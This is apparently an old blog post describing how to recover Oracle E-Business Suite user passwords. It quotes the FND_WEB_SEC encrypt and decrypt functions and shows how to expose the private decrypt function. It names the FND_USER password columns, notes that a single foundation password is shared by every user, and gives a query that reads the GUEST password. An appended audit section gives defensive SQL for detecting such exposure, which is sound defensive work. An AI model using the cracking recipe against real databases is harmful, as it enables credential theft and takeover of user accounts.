Cracking Oracle E-Business Suite User Passwords
Oracle December 13th, 2006
APPS.FND_WEB_SEC manages data related to user authorization, such as passwords.
This package contains encryption and decryption functions:
-- Function to encrypt a string using a specified key.
-- 4257466 Changed this function to call the new overloaded version.
-- This is backwards compatible because null is returned if the profile
-- does not exist.
function encrypt(key in varchar2, value in varchar2)
  return varchar2
is
begin
  -- bug 4676957 Renamed password case sensitivity profile
  return(encrypt(key, value, fnd_profile.value('SIGNON_PASSWORD_CASE')));
end;

-- Function to decrypt an encrypted string using a specified key.
function decrypt(key in varchar2, value in varchar2)
  return varchar2
as language java name 'oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String';
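These two functions work by calling Java code to do the computation (so you do not even need to log in to the database to do the cracking).
Because they are private functions, they must be declared in the package specification before they can be called from other PL/SQL programs:
function encrypt(key in varchar2, value in varchar2) return varchar2;
function decrypt(key in varchar2, value in varchar2) return varchar2;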
In EBS, user passwords are stored in the table APPLSYS.FND_USER:
FND_USER.ENCRYPTED_USER_PASSWORD: the user's password
ENCRYPTED_FOUNDATION_PASSWORD: the encrypted string of the key
Oracle's algorithm for ENCRYPTED_FOUNDATION_PASSWORD is:
encFndPwd := encrypt(user||'/'||pwd,fndPwd);
In fact, the FOUNDATION_PASSWORD is the same for all users, so there is no need to crack each user's ENCRYPTED_FOUNDATION_PASSWORD.
To obtain the GUEST password:
SELECT upper(fnd_profile.value('GUEST_USER_PWD')) FROM dual;
Reference:
Oracle Applications Passwords Decryption Vulnerability
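
An added audit example, not part of the original post or of Oracle's code: from the defender's side, these queries check whether decrypt has been exposed or wrapped as described above, and who can read APPLSYS.FND_USER. It assumes access to the DBA_* dictionary views and that the package is owned by APPS, as the post states.

```sql
-- Added audit example (not from the original post).
-- Assumes DBA_* view access and the APPS / APPLSYS owners named in the post.

-- 1. Is DECRYPT declared in the FND_WEB_SEC package specification?
--    The post notes it is private, so a hit here means the spec was changed.
SELECT line, text
FROM   dba_source
WHERE  owner = 'APPS'
AND    name  = 'FND_WEB_SEC'
AND    type  = 'PACKAGE'            -- specification only, not 'PACKAGE BODY'
AND    REGEXP_LIKE(text, 'function\s+decrypt', 'i')
ORDER  BY line;

-- 2. Any other stored code bound to the same Java decrypt method?
SELECT owner, name, type, line
FROM   dba_source
WHERE  UPPER(text) LIKE '%WEBSESSIONMANAGERPROC.DECRYPT%'
AND    NOT (owner = 'APPS' AND name = 'FND_WEB_SEC' AND type = 'PACKAGE BODY')
ORDER  BY owner, name, line;

-- 3. When were the package spec and body last changed or recompiled?
SELECT object_type, status, last_ddl_time
FROM   dba_objects
WHERE  owner = 'APPS'
AND    object_name = 'FND_WEB_SEC'
ORDER  BY object_type;

-- 4. Who holds table-level or column-level read access to FND_USER?
SELECT grantee, privilege, NULL AS column_name
FROM   dba_tab_privs
WHERE  owner = 'APPLSYS'
AND    table_name = 'FND_USER'
AND    privilege IN ('SELECT', 'READ')
UNION ALL
SELECT grantee, privilege, column_name
FROM   dba_col_privs
WHERE  owner = 'APPLSYS'
AND    table_name = 'FND_USER'
ORDER  BY grantee;

-- 5. System privileges that bypass object grants for reading or rewriting code.
SELECT grantee, privilege
FROM   dba_sys_privs
WHERE  privilege IN ('SELECT ANY TABLE', 'READ ANY TABLE',
                     'CREATE ANY PROCEDURE', 'ALTER ANY PROCEDURE')
ORDER  BY grantee, privilege;
```

Rows from queries 1 or 2, or a LAST_DDL_TIME in query 3 that does not match a known patch window, are the findings to investigate first.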